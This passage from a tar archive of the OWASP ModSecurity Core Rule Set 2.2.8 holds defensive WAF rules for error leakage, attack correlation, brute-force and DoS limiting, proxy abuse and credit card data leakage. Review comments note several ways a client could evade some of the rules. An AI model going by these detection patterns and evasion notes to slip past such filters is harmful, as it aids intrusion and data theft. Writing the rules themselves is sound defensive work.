The script cannot continue running\b)|Microsoft VBScript (?:compilation (?:\(0x8|error)|runtime (?:Error|\(0x8))\b|Object required: '|error '800)|<b>Version Information:<\/b>(?: |\s)(?:Microsoft \.NET Framework|ASP\.NET) Version:|>error 'ASP\b|An Error Has Occurred|>Syntax error in string in query expression|\/[Ee]rror[Mm]essage\.aspx?\?[Ee]rror\b)" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'IIS Information Leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970004',tag:'OWASP_CRS/LEAKAGE/ERRORS_IIS',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_STATUS "!^404$" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',chain,t:none,capture,ctl:auditLogParts=+E,block,msg:'IIS Information Leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970904',tag:'OWASP_CRS/LEAKAGE/ERRORS_IIS',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3'" SecRule RESPONSE_BODY "\bServer Error in.{0,50}?\bApplication\b" "t:none,capture,setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{tx.0}" # Directory Listing SecRule RESPONSE_BODY "(?:<(?:TITLE>Index of.*?<H|title>Index of.*?<h)1>Index of|>\[To Parent Directory\]<\/[Aa]><br>)" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'Directory Listing',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',id:'970013',tag:'OWASP_CRS/LEAKAGE/INFO_DIRECTORY_LISTING',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/INFO-%{matched_var_name}=%{tx.0}" SecMarker END_OUTBOUND_CHECK ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_59_outbound_blocking.conf�������0000664�0000000�0000000�00000002650�12164572564�0033044�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # You should set the score to the proper threshold you would prefer. If kept at "@gt 0" # it will work similarly to previous Mod CRS rules and will create an event in the error_log # file if there are any rules that match. If you would like to lessen the number of events # generated in the error_log file, you should increase the anomaly score threshold to # something like "@gt 20". 
This would only generate an event in the error_log file if # there are multiple lower severity rule matches or if any 1 higher severity item matches. # # You should also set the desired disruptive action (deny, redirect, etc...). # # Alert and Block on High Anomaly Scores - this would block outbound data leakages # SecRule TX:OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_level}" \ "chain,phase:4,id:'981200',t:none,deny,msg:'Outbound Anomaly Score Exceeded (score %{TX.OUTBOUND_ANOMALY_SCORE}): Last Matched Message: %{tx.msg}',logdata:'Last Matched Data: %{matched_var}'" SecRule TX:ANOMALY_SCORE_BLOCKING "@streq on" chain SecRule TX:/^\d/ "(.*)" ����������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_60_correlation.conf�������������0000664�0000000�0000000�00000005162�12164572564�0031647�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This file is used in post processing after the response has been sent to # the client (in the logging phase). Its purpose is to provide inbound+outbound # correlation of events to provide a more intelligent designation as to the outcome # or result of the transaction - meaning, was this a successful attack? 
#
# Correlated Successful Attack
#
# Chain 981201 (phase 5, log, pass, severity 0): fires when at least one TX
# variable name matches LEAKAGE/ERRORS and at least one matches WEB_ATTACK.
# On a match the remaining correlation rules are skipped
# (skipAfter:END_CORRELATION).
# "Successful" is an inference: the chain only establishes that an inbound
# attack match and an outbound error-leakage match occurred in the same
# transaction, not that one caused the other. Treat the event as a lead to
# triage.
# Only names containing LEAKAGE/ERRORS count here; outbound findings recorded
# under other categories (for example LEAKAGE/SOURCE_CODE or LEAKAGE/INFO in
# the outbound rules file) do not trigger this correlation.
#
SecRule &TX:'/LEAKAGE\\\/ERRORS/' "@ge 1" \
        "chain,phase:5,id:'981201',t:none,log,pass,skipAfter:END_CORRELATION,severity:'0',msg:'Correlated Successful Attack Identified: (Total Score: %{tx.anomaly_score}, SQLi=%{TX.SQL_INJECTION_SCORE}, XSS=%{TX.XSS_SCORE}) Inbound Attack (%{tx.inbound_tx_msg} - Inbound Anomaly Score: %{TX.INBOUND_ANOMALY_SCORE}) + Outbound Data Leakage (%{tx.msg} - Outbound Anomaly Score: %{TX.OUTBOUND_ANOMALY_SCORE})'"
        SecRule &TX:'/WEB_ATTACK/' "@ge 1" "t:none"

# Correlated Attack Attempt
#
# Chain 981202 (phase 5, log, pass, severity 1): fires when at least one TX
# variable name matches AVAILABILITY/APP_NOT_AVAIL and at least one matches
# WEB_ATTACK, i.e. an inbound attack match coincided with an application error
# in the response. Also skips to END_CORRELATION on a match.
#
SecRule &TX:'/AVAILABILITY\\\/APP_NOT_AVAIL/' "@ge 1" \
        "chain,phase:5,id:'981202',t:none,log,pass,skipAfter:END_CORRELATION,severity:'1',msg:'Correlated Attack Attempt Identified: (Total Score: %{tx.anomaly_score}, SQLi=%{TX.SQL_INJECTION_SCORE}, XSS=%{TX.XSS_SCORE}) Inbound Attack (%{tx.inbound_tx_msg} Inbound Anomaly Score: %{TX.INBOUND_ANOMALY_SCORE}) + Outbound Application Error (%{tx.msg} - Outbound Anomaly Score: %{TX.OUTBOUND_ANOMALY_SCORE})'"
        SecRule &TX:'/WEB_ATTACK/' "@ge 1" "t:none"

# Chain 981203: inbound score is above 0 but below
# tx.inbound_anomaly_score_level. Logged with noauditlog, so the event reaches
# the error log but produces no audit log entry; skips to END_CORRELATION.
# NOTE(review): tx.inbound_anomaly_score and tx.inbound_tx_msg are assigned
# outside this file (the inbound blocking rules set them); if those rules are
# disabled, the three score rules below presumably have nothing to compare -
# confirm.
SecRule TX:INBOUND_ANOMALY_SCORE "@gt 0" \
        "chain,phase:5,id:'981203',t:none,log,noauditlog,pass,skipAfter:END_CORRELATION,msg:'Inbound Anomaly Score (Total Inbound Score: %{TX.INBOUND_ANOMALY_SCORE}, SQLi=%{TX.SQL_INJECTION_SCORE}, XSS=%{TX.XSS_SCORE}): %{tx.inbound_tx_msg}'"
        SecRule TX:INBOUND_ANOMALY_SCORE "@lt %{tx.inbound_anomaly_score_level}"

# 981204: inbound score reached tx.inbound_anomaly_score_level. No skipAfter,
# so 981205 is still evaluated afterwards.
SecRule TX:INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_level}" \
        "phase:5,id:'981204',t:none,log,noauditlog,pass,msg:'Inbound Anomaly Score Exceeded (Total Inbound Score: %{TX.INBOUND_ANOMALY_SCORE}, SQLi=%{TX.SQL_INJECTION_SCORE}, XSS=%{TX.XSS_SCORE}): %{tx.inbound_tx_msg}'"

# 981205: outbound score reached tx.outbound_anomaly_score_level.
SecRule TX:OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_level}" \
        "phase:5,id:'981205',t:none,log,noauditlog,pass,msg:'Outbound Anomaly Score Exceeded (score %{TX.OUTBOUND_ANOMALY_SCORE}): %{tx.msg}'"

# Target of the skipAfter actions in 981201, 981202 and 981203.
SecMarker END_CORRELATION
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/����������������������������������������0000775�0000000�0000000�00000000000�12164572564�0024433�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/modsecurity_crs_11_brute_force.conf�����0000664�0000000�0000000�00000006507�12164572564�0033410�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#--------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
# ---------------------------------------------------------------
#
# Anti-Automation Rule for specific Pages (Brute Force Protection)
# This is a rate-limiting rule set and does not directly correlate whether the
# authentication attempt was successful or not.
#
# All state lives in the persistent IP collection, which must be initialised
# (initcol) before these rules run.
# NOTE(review): the initcol call is not in this file - confirm which address
# it keys on. If the key comes from a client-supplied header, a client can
# change it per request and never accumulate a count.
#

#
# Enforce an existing IP address block and log only 1-time/minute
# We don't want to get flooded by alerts during an attack or scan so
# we are only triggering an alert once/minute.  You can adjust how often
# you want to receive status alerts by changing the expirevar setting below.
#
# The chained rule matches only while ip.brute_force_block_flag is absent; it
# then sets the flag for 60 seconds, copies the hit counter into the TX
# variable used by msg, and resets the counter.
#
SecRule IP:BRUTE_FORCE_BLOCK "@eq 1" "chain,phase:1,id:'981036',block,msg:'Brute Force Attack Identified from %{tx.real_ip} (%{tx.brute_force_block_counter} hits since last alert)',setvar:ip.brute_force_block_counter=+1"
    SecRule &IP:BRUTE_FORCE_BLOCK_FLAG "@eq 0" "setvar:ip.brute_force_block_flag=1,expirevar:ip.brute_force_block_flag=60,setvar:tx.brute_force_block_counter=%{ip.brute_force_block_counter},setvar:ip.brute_force_block_counter=0"

#
# Block and track # of requests but don't log
SecRule IP:BRUTE_FORCE_BLOCK "@eq 1" "phase:1,id:'981037',block,nolog,setvar:ip.brute_force_block_counter=+1"

#
# skipAfter Checks
# There are different scenarios where we don't want to do checks -
# 1. If the user has not defined any URLs for Brute Force Protection in the 10 config file
# 2. If the current URL is not listed as a protected URL
# 3. If the current IP address has already been blocked due to high requests
# In these cases, we skip doing the request counts.
#
SecRule &TX:BRUTE_FORCE_PROTECTED_URLS "@eq 0" "phase:5,id:'981038',t:none,nolog,pass,skipAfter:END_BRUTE_FORCE_PROTECTION_CHECKS"

# tx.filename is the request filename wrapped in '#' characters; the chained
# rule skips counting when that string is not contained in
# tx.brute_force_protected_urls.
# NOTE(review): presumably the protected-URL list uses the same '#' wrapping
# so that only whole paths match - confirm against the setup file.
SecRule REQUEST_FILENAME ".*" "chain,phase:5,id:'981039',t:none,nolog,pass,setvar:'tx.filename=#%{request_filename}#',skipAfter:END_BRUTE_FORCE_PROTECTION_CHECKS"
    SecRule TX:FILENAME "!@within %{tx.brute_force_protected_urls}"

SecRule IP:BRUTE_FORCE_BLOCK "@eq 1" "phase:5,id:'981040',t:none,nolog,pass,skipAfter:END_BRUTE_FORCE_PROTECTION_CHECKS"

#
# Brute Force Counter
# Count the number of requests to these resources
#
SecAction "phase:5,id:'981041',t:none,nolog,pass,setvar:ip.brute_force_counter=+1"

#
# Check Brute Force Counter
# If the request count is greater than tx.brute_force_counter_threshold
# (the operator is @gt, so a count equal to the threshold does not trigger),
# we then increment the burst counter, let it expire after
# tx.brute_force_burst_time_slice seconds, and clear the request counter.
#
SecRule IP:BRUTE_FORCE_COUNTER "@gt %{tx.brute_force_counter_threshold}" "phase:5,id:'981042',t:none,nolog,pass,t:none,setvar:ip.brute_force_burst_counter=+1,expirevar:ip.brute_force_burst_counter=%{tx.brute_force_burst_time_slice},setvar:!ip.brute_force_counter"

#
# Check Brute Force Burst Counter and set Block
# Check the burst counter - if greater than or equal to 2, then we set the IP
# block variable for tx.brute_force_block_timeout seconds and issue an alert.
# SecRule IP:BRUTE_FORCE_BURST_COUNTER "@ge 2" "phase:5,id:'981043',t:none,log,pass,msg:'Potential Brute Force Attack from %{tx.real_ip} - # of Request Bursts: %{ip.brute_force_burst_counter}',setvar:ip.brute_force_block=1,expirevar:ip.brute_force_block=%{tx.brute_force_block_timeout}" SecMarker END_BRUTE_FORCE_PROTECTION_CHECKS �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/modsecurity_crs_11_dos_protection.conf��0000664�0000000�0000000�00000004256�12164572564�0034143�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# # Anti-Automation rule set for detecting Denial of Service Attacks. # # # Enforce an existing IP address block and log only 1-time/minute # We don't want to get flooded by alerts during an attack or scan so # we are only triggering an alert once/minute. You can adjust how often # you want to receive status alerts by changing the expirevar setting below. 
#
# The chained rule matches only while ip.dos_block_flag is absent; it then
# sets the flag for 60 seconds, copies the hit counter into the TX variable
# used by msg, and resets the counter. The disruptive action is "drop".
#
SecRule IP:DOS_BLOCK "@eq 1" "chain,phase:1,id:'981044',drop,msg:'Denial of Service (DoS) Attack Identified from %{tx.real_ip} (%{tx.dos_block_counter} hits since last alert)',setvar:ip.dos_block_counter=+1"
    SecRule &IP:DOS_BLOCK_FLAG "@eq 0" "setvar:ip.dos_block_flag=1,expirevar:ip.dos_block_flag=60,setvar:tx.dos_block_counter=%{ip.dos_block_counter},setvar:ip.dos_block_counter=0"

#
# Block and track # of requests but don't log
SecRule IP:DOS_BLOCK "@eq 1" "phase:1,id:'981045',t:none,drop,nolog,setvar:ip.dos_block_counter=+1"

#
# skipAfter Check
# There are different scenarios where we don't want to do checks -
# 1. If the current IP address has already been blocked due to high requests
# In this case, we skip doing the request counts.
#
SecRule IP:DOS_BLOCK "@eq 1" "phase:5,id:'981046',t:none,nolog,pass,skipAfter:END_DOS_PROTECTION_CHECKS"

#
# DOS Counter
# Count the number of requests to non-static resources
#
# "Static" is decided by a case-sensitive extension match on REQUEST_BASENAME
# with no transformation (t:none), so an upper-case extension still counts.
#
SecRule REQUEST_BASENAME "!\.(jpe?g|png|gif|js|css|ico)$" "phase:5,id:'981047',t:none,nolog,pass,setvar:ip.dos_counter=+1"

#
# Check DOS Counter
# If the request count is greater than tx.dos_counter_threshold (the operator
# is @gt, so a count equal to the threshold does not trigger), we then
# increment the burst counter, let it expire after tx.dos_burst_time_slice
# seconds, and clear the request counter.
#
SecRule IP:DOS_COUNTER "@gt %{tx.dos_counter_threshold}" "phase:5,id:'981048',t:none,nolog,pass,t:none,setvar:ip.dos_burst_counter=+1,expirevar:ip.dos_burst_counter=%{tx.dos_burst_time_slice},setvar:!ip.dos_counter"

#
# Check DOS Burst Counter and set Block
# Check the burst counter - if greater than or equal to 2, then we set the IP
# block variable for tx.dos_block_timeout seconds and issue an alert.
# SecRule IP:DOS_BURST_COUNTER "@ge 2" "phase:5,id:'981049',t:none,log,pass,msg:'Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',setvar:ip.dos_block=1,expirevar:ip.dos_block=%{tx.dos_block_timeout}" SecMarker END_DOS_PROTECTION_CHECKS ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/modsecurity_crs_11_proxy_abuse.conf�����0000664�0000000�0000000�00000003162�12164572564�0033443�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Rule set for detecting Open Proxy Abuse/Chaining. 
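#
# http://blog.spiderlabs.com/2011/03/detecting-malice-with-modsecurity-open-proxy-abuse.html
#
#
# You must first download the MaxMind GeoIP Lite City DB -
#
# http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
#
# You then need to define the proper path for the SecGeoLookupDb directive
#
SecGeoLookupDb /usr/local/apache/conf/modsec/GeoLiteCity.dat

#
# Rule logic (one chained rule, id 981050):
#  1. Capture the first dotted-quad at the start of X-Forwarded-For, unless
#     its first octet is exactly 192, 127 or 10.
#  2. Geo-locate the captured address and remember its country code.
#  3. Geo-locate REMOTE_ADDR.
#  4. If the two country codes differ, raise the anomaly and automation
#     scores by tx.warning_anomaly_score.
#
# The first-octet exclusion is written as a lookahead on the whole octet.
# The earlier lookbehind form, (?<!192|127|10) placed after \d{1,3}, also
# rejected any first octet that merely ends in "10" (110.x.x.x, 210.x.x.x),
# so those public addresses were never checked.
#
# X-Forwarded-For is set by the client or by any intermediary, so a mismatch
# is a scoring signal, not proof; a client can also avoid the rule by sending
# a header value whose country matches its real address.
#
# NOTE(review): the exclusion is by first octet only - it skips all of
# 192.x.x.x and does not skip 172.16-31.x.x. Confirm that is intended.
#
SecRule REQUEST_HEADERS:X-Forwarded-For "^\b(?!(?:192|127|10)\.)\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b" "chain,phase:1,id:'981050',t:none,capture,block,rev:'2.2.8',msg:'Potential Open Proxy Abuse - GeoIP Country Code Mismatch of X-Forwarded-For Request Header and Client REMOTE_ADDR',logdata:'IP Country is: %{geo.country_code} and X-Forwarded-For is: %{tx.geo_x-forwarded-for}'"
    SecRule TX:0 "@geoLookup" "chain,setvar:tx.geo_x-forwarded-for=%{geo.country_code}"
        SecRule REMOTE_ADDR "@geoLookup" "chain,t:none"
            SecRule GEO:COUNTRY_CODE "!@streq %{tx.geo_x-forwarded-for}" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.automation_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-AUTOMATION/MALICIOUS-%{matched_var_name}=%{matched_var}"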
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_11_slow_dos_protection.conf���������������������������������������������������������0000664�0000000�0000000�00000002304�12164572564�0035120�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Rule set for detecting Slow HTTP Denial of Service Attacks. # # http://blog.spiderlabs.com/2010/11/advanced-topic-of-the-week-mitigating-slow-http-dos-attacks.html # # # Mitigate Slowloris-type slow HTTP attacks # SecReadStateLimit 100 # # Mitigate Slow HTTP POST attacks # # Must have the mod_reqtimeout module installed # You should adjust the RequestReadTimeout body directive setting to a limit # that will allow any legitimate slow clients or large file uplaods. 
# <IfModule reqtimeout_module> RequestReadTimeout body=30 </IfModule> SecRule RESPONSE_STATUS "@streq 408" "phase:5,id:'981051',t:none,nolog,pass,setvar:ip.slow_dos_counter=+1,expirevar:ip.slow_dos_counter=60" SecRule IP:SLOW_DOS_COUNTER "@gt 5" "phase:1,id:'981052',t:none,log,drop,msg:'Client Connection Dropped due to high # of slow DoS alerts'" ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_16_scanner_integration.conf���������������������������������������������������������0000664�0000000�0000000�00000002317�12164572564�0035066�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
# --------------------------------------------------------------- # # -=[ You must be using the Resource Profiling Rules to track this data ]=- # # modsecurity_crs_40_appsensor_detection_point_2.0_setup.conf # modsecurity_crs_40_appsensor_detection_point_3.0_end.conf # # # -=[ Disable ModSecurity For Arachni Scans ]=- # # Update the remote IP address for your Arachni RPC host # #SecRule REMOTE_ADDR "@ipMatch 192.168.168.128" "chain,id:'900030',phase:1,t:none,nolog,pass" # SecRule REQUEST_HEADERS:User-Agent "@beginsWith Arachni/" "ctl:ruleEngine=Off" # # -=[ Initiate Arachni Scan on 1st URL Access ]=- # # Update the path to the arachni_integration.lua script # #SecRule &RESOURCE:ARACHNI_SCAN_COMPLETED "@eq 0" "chain,id:'900031',phase:5,t:none,log,pass" # SecRule &ARGS "@gt 0" "exec:/etc/apache2/modsecurity-crs/lua/arachni_integration.lua" �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/modsecurity_crs_25_cc_track_pan.conf����0000664�0000000�0000000�00000003043�12164572564�0033515�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
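# ---------------------------------------------------------------
#
# Credit Card Track 1 and 2 and PAN Leakage Checks
#
# These rules inspect RESPONSE_BODY in phase:4, so they only see data when
# response body buffering is enabled for the content type being served
# (SecResponseBodyAccess / SecResponseBodyMimeType).
#
# Each match adds tx.critical_anomaly_score to tx.anomaly_score. The setvar
# has to use the %{...} macro form: a bare {tx.critical_anomaly_score} is
# taken as a literal string rather than the configured score, so the leak
# would be detected but never counted towards the blocking threshold.
#
# The patterns are format checks only (no checksum), so other long digit runs
# can match; ModSecurity's @verifyCC operator adds a Luhn check if that is
# wanted.
#
# NOTE(review): none of these rules carries the "capture" action, so %{tx.0}
# is not populated by the match itself and the LEAKAGE/CC variable may be
# empty or hold a value captured by an earlier rule. Before adding "capture",
# decide whether card data should be held in a TX variable at all, since
# anything later referenced from msg/logdata is written to the logs.
#

# Track 1: "%B" + account number + "^" + name field + "^" + digits + "?"
SecRule RESPONSE_BODY "\%[Bb][3456][0-9]{3,3}[\x20\-]{0,3}[0-9]{4,6}[\x20\-]{0,3}[0-9]{2,5}[\x20\-]{0,3}[0-9]{0,4}\^[^\^]+\^[0-9]+\?" \
    "phase:4,t:none,block,msg:'Possible Credit Card Track 1 Data Leakage.',severity:'1',id:'920021',tag:'WASCTC/5.2',tag:'PCI/3.3',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}"

# Track 2: ";" + account number + "=" or "D" + digits + "?"
SecRule RESPONSE_BODY "\;[3456][0-9]{3,3}[\x20\-]{0,3}[0-9]{4,6}[\x20\-]{0,3}[0-9]{2,5}[\x20\-]{0,3}[0-9]{0,4}[=Dd][0-9]+\?" \
    "phase:4,t:none,block,msg:'Possible Credit Card Track 2 Data Leakage.',severity:'1',id:'920022',tag:'WASCTC/5.2',tag:'PCI/3.3',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}"

# Bare PAN: the pattern requires one non-digit character on each side, so a
# number at the very first or very last byte of the body is not matched.
SecRule RESPONSE_BODY "[^0-9][3456][0-9]{3,3}[\x20\-]{0,3}[0-9]{4,6}[\x20\-]{0,3}[0-9]{2,5}[\x20\-]{0,3}[0-9]{0,4}[^0-9]" \
    "phase:4,t:none,block,msg:'Possible Credit Card PAN Data Leakage.',severity:'1',id:'920023',tag:'WASCTC/5.2',tag:'PCI/3.3',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}"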
���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_40_appsensor_detection_point_2.0_setup.conf�����������������������������������������0000664�0000000�0000000�00000004674�12164572564�0040117�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # -=[ OWASP AppSensor Detection Points - Setup ]=- # # - https://www.owasp.org/index.php/AppSensor_DetectionPoints # # Instead of creating rule set based on analyzing saved audit log data, we can # instead profile live transactions in phase:5 post processing and save data in # Resource-based persistent collections. Once we have seen enough traffic (as # defined below) we can then move into Enforcement Mode. 
# # # --[ Step 1: Initiate the Resource Collection ]-- # # We are using the REQUEST_FILENAME as the key and then set 2 variables - # # [resource.min_pattern_threshold] # Set the resource.min_pattern_threshold as the minimum number of times that a match should occur # in order to include it into the profile # # [resource.min_traffic_threshold] # Set the resource.min_traffic_threshold as the minimum number of "clean" transactions # to profile/inspect before enforcement of the profile begins. # SecAction "phase:1,id:'981082',t:none,nolog,pass,initcol:resource=%{request_headers.host}_%{request_filename},setvar:resource.min_pattern_threshold=50,setvar:resource.min_traffic_threshold=100" # # --[ Ignore Resource ]-- # # If you want to exclude a resource from being profiled, you can specify it in the # modsecurity_40_profiler_ignore.data file. This rule will evaluate the REQUEST_FILENAME # and if there is match in the @pmFromFile check, it will skip all profiling/enforcement # rules in this file. We have to run two checks here - # 1. For Phase:2 - Enforcement Checks # 2. For Phase:5 - Profiling Analysis # # If there is a match, the rules will skip down until it hits the SecMarker END_PROFILER_RULES # at the end of this file. # # If you want to use these rules you must: # 1. Uncomment the rules # 2. 
Create the modsecurity_40_appsensor_ignore.data file in the same directory # #SecRule REQUEST_FILENAME "@pmFromFile modsecurity_40_appsensor_ignore.data" "phase:2,id:'981083',t:none,nolog,pass,skipAfter:END_PROFILER_RULES" #SecRule REQUEST_FILENAME "@pmFromFile modsecurity_40_appsensor_ignore.data" "phase:5,id:'981084',t:none,nolog,pass,skipAfter:END_PROFILER_RULES" ��������������������������������������������������������������������modsecurity_crs_40_appsensor_detection_point_2.1_request_exception.conf�����������������������������0000664�0000000�0000000�00000020773�12164572564�0042524�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.0 # Copyright (C) 2006-2011 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # -=[ OWASP AppSensor Detection Points - Request Exceptions (RE) Category ]=- # # - https://www.owasp.org/index.php/AppSensor_DetectionPoints#RequestException # # Instead of creating rule set based on analyzing saved audit log data, we can # instead profile live transactions in phase:5 post processing and save data in # Resource-based persistent collections. Once we have seen enough traffic (as # defined below) we can then move into Enforcement Mode. # SecMarker BEGIN_RE_PROFILE_ENFORCEMENT # # Should we enforce the learned profile for this transaction? # # If the resource.enforce_profile parameter is not set, then we skip enforcement. 
